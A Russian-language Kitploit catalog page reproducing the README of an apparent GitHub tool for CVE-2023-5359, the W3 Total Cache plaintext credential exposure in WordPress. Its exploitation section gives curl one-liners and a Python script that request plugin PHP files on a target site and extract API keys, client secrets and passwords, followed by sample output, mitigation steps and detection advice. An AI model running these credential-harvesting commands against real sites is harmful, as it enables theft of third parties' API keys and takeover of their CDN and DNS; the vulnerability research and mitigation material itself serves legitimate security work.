Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-5359 — CVE-2023-5359 — Сканер уязвимости хранения данных в открытом виде W3 Total Cache. Обнаруживает раскрытые учетные данные в W3 Total Cache версии плагина ≤ 2.7.5. | Kitploit
Инструменты/GitHubGitHub/enzocipher/cve-2023-5359
Сканеры уязвимостейАтаки на ПаролиЭксплуатацияСбор информацииВеб-безопасностьОбучение и Образование
GitHubenzocipher/cve-2023-5359

CVE-2023-5359

CVE-2023-5359 — Сканер уязвимости хранения данных в открытом виде W3 Total Cache. Обнаруживает раскрытые учетные данные в W3 Total Cache версии плагина ≤ 2.7.5.

Репозиторий
9 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-5359 - Уязвимость хранения открытого текста W3 Total Cache

Описание

CVE-2023-5359 — это уязвимость хранения открытого текста, затрагивающая плагин WordPress W3 Total Cache версий ≤ 2.7.5. Данная уязвимость позволяет удалённым злоумышленникам получить доступ к конфиденциальным учётным данным, хранящимся в незашифрованных PHP-файлах, доступных публично.

Критичность

  • Оценка CVSS: 7.5 (Высокая)
  • Вектор: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  • Тип: Раскрытие конфиденциальной информации

Техническая уязвимость

Причина возникновения

W3 Total Cache хранит параметры конфигурации и учётные данные API в PHP-файлах внутри директории /wp-content/plugins/w3-total-cache/ без надлежащей защиты. Эти файлы доступны через HTTP, что раскрывает:

  • Ключи API (CloudFlare, Google и т.д.)
  • Секреты клиентов
  • Токены OAuth
  • Учётные данные внешних сервисов

Затронутые файлы

root@kitploit:~
/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php
/wp-content/plugins/w3-total-cache/Extension_FeedBurner_Plugin.php
/wp-content/plugins/w3-total-cache/Config.php
/wp-content/plugins/w3-total-cache/Cache_File.php

Эксплуатация

Ручной метод

root@kitploit:~
# Check if W3 Total Cache is installed
curl -s https://target.com/ | grep "w3-total-cache"

# Extract CloudFlare credentials
curl -s "https://target.com/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php" | grep -E "client_id|client_secret"

# Search all vulnerable files
for file in Extension_CloudFlare_Plugin.php Generic_Plugin_Admin.php Config.php; do
    echo "=== $file ==="
    curl -s "https://target.com/wp-content/plugins/w3-total-cache/$file" | grep -E "api_key|password|secret"
done

Автоматизированный скрипт

root@kitploit:~
#!/usr/bin/env python3
import requests
import re

target = "https://victim.com"
files = [
    "/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php",
    "/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php"
]

for file in files:
    response = requests.get(target + file)
    credentials = re.findall(r"(api_key|client_secret|password)\s*=\s*['\"](https://github.com/enzocipher/cve-2023-5359/blob/HEAD/%5B%5E%27%5C%22%5D+)", response.text)
    if credentials:
        print(f"[!] Credentials found in {file}:")
        for key, value in credentials:
            print(f"    {key}: {value}")

Воздействие

Злоумышленник может получить:

  1. Учётные данные CloudFlare — взять под контроль CDN и DNS
  2. Ключи API для внешних сервисов — получить доступ к внешним аккаунтам
  3. Токены OAuth — выдать себя за кого-либо
  4. Конфигурации кеша — манипулировать обслуживаемым контентом

Смягчение

Немедленное решение

  1. Обновите W3 Total Cache до версии ≥ 2.7.6
  2. Ограничьте доступ к PHP-файлам в директории плагинов
  3. Отзовите и создайте заново все раскрытые учётные данные

Безопасная конфигурация

root@kitploit:~
# .htaccess protection
<Files *.php>
    Deny from all
</Files>
<Files "w3-total-cache.php">
    Allow from all
</Files>

Обнаружение

Команда проверки

root@kitploit:~
# Check for vulnerable version
curl -s https://target.com/wp-content/plugins/w3-total-cache/w3-total-cache.php | grep "Version"

Индикаторы компрометации

  • Необычная активность во внешних API
  • Изменения в конфигурациях CloudFlare
  • Трафик с неавторизованных IP-адресов к подключённым сервисам

Пример находки

root@kitploit:~
[*] Scanning: https://example.com
[+] W3 Total Cache detected
[+] Accessible file: /wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
[!] CREDENTIALS FOUND:
    client_id: GAxxxxxxxxxxxx78
    client_secret: ABcdEFghIJklMNopQRstUVwxYZ012345

Ссылки

  • CVE-2023-5359
  • Журнал изменений W3 Total Cache
  • Команда безопасности WordPress

Правовое уведомление

Этот репозиторий предназначен только для образовательных целей и авторизованного тестирования на проникновение. Злонамеренное использование этой информации строго запрещено.


Нашли эту информацию полезной? Поставьте звёздочку репозиторию!

Последнее обновление: Ноябрь 2025

Скачать инструмент